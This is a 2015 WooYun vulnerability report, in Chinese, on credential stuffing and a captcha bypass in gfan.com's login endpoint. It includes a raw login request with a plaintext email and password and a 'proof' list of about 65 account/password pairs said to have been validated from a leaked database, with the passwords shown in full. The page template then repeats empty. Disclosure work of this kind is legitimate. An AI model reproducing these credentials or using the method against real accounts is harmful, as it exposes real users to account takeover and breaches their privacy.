机锋某接口撞库泄露用户登录凭据(有批量账号证明)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109312

漏洞标题：机锋某接口撞库泄露用户登录凭据(有批量账号证明)

漏洞作者：路人甲

提交时间：2015-04-21 10:40

修复时间：2015-06-05 10:48

公开时间：2015-06-05 10:48

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-21：细节已通知厂商并且等待厂商处理中
2015-04-21：厂商已经确认，细节仅向厂商公开
2015-05-01：细节向核心白帽子及相关领域专家公开
2015-05-11：细节向普通白帽子公开
2015-05-21：细节向实习白帽子公开
2015-06-05：细节向公众公开

简要描述：

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础，利用用户相同的注册习惯（相同的用户名和密码），尝试登陆其它的网站。2011年，互联网泄密事件引爆了整个信息安全界，导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括：天涯：31,758,468条，CSDN：6,428,559条，微博：4,442,915条，人人网：4,445,047条，猫扑：2,644,726条，178：9,072,819条，嘟嘟牛：13,891,418条，7K7K：18,282,404条，共1.2亿条。不管你的网站密码保护的多好，但是面对已经泄露的账号密码，撞库扫号防御还是一个相当重要的环节。

详细说明：

主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号
主站登陆验证码绕过。验证码只在之前的一步有验证，最后登录的时候没有验证。。这逻辑写的。。。
登录数据包如下：

POST /doLogin HTTP/1.1
Host: my.gfan.com
Proxy-Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://my.gfan.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://my.gfan.com/login?returnUrl=http://www.gfan.com/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: 
RA-Ver: 2.9.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
Connection: close
gotoUrl=http%3A%2F%2Fwww.gfan.com%2Findex.php&loginName=zhangyajun131@163%2ecom&password=57529704&authCode=

漏洞证明：

经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号.目前互联网上公开的账号都有数亿的规模，真要被利用的话危害还是很大的。

[email protected]	429131222
[email protected]	wtzjw885281112
[email protected]	12345678
[email protected]	19880818
[email protected]	90281972
[email protected]	83030545
[email protected]	072324aa
[email protected]	liliangS
[email protected]	369258174
[email protected]	5991139989
[email protected]	sigon621
[email protected]	nishiwo20
[email protected]	610054
[email protected]	xuqingyu
[email protected]	123456
[email protected]	chen1234
[email protected]	78524
[email protected]	hjhgm7679
[email protected]	19831210
[email protected]	dxlzj0513
[email protected]	steers19841122
[email protected]	12334566
[email protected]	5b8w2pck
[email protected]	wn19900809
[email protected]	65580321
[email protected]	zjtzlhjs
[email protected]	42142130999
[email protected]	983170
[email protected]	19821025hy
[email protected]	19850s23
[email protected]	feidong7031
[email protected]	19841226
[email protected]	tekprene
[email protected]	92540819
[email protected]	wangjing
[email protected]	houdong135245
[email protected]	bkr54127
[email protected]	19761113
[email protected]	123456789yz
[email protected]	bingbing
[email protected]	jco123
[email protected]	wisdom73
[email protected]	800818
[email protected]	3249006
[email protected]	x8182131y
[email protected]	69158089
[email protected]	959001112
[email protected]	79801314
[email protected]	03281250
[email protected]	19800515
[email protected]	heng1025
[email protected]	ccrr19880827
[email protected]	aaa123123
[email protected]	1988602418
[email protected]	zqwzqwzqw
[email protected]	62637736
[email protected]	hjwisatc
[email protected]	85798579
[email protected]	122545669
[email protected]	a121522434
[email protected]	1033286hao
[email protected]	13166493747
[email protected]	wangjiaxi
[email protected]	tony5212129
[email protected]	8902061125
[email protected]	qq123456

修复方案：

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-04-21 10:46

厂商回复：

谢谢，修复中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109312

漏洞标题：机锋某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商：机锋网

漏洞作者：路人甲

提交时间：2015-04-21 10:40

修复时间：2015-06-05 10:48

公开时间：2015-06-05 10:48

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109312

漏洞标题：机锋某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商：机锋网

漏洞作者： 路人甲

提交时间：2015-04-21 10:40

修复时间：2015-06-05 10:48

公开时间：2015-06-05 10:48

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0109312"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云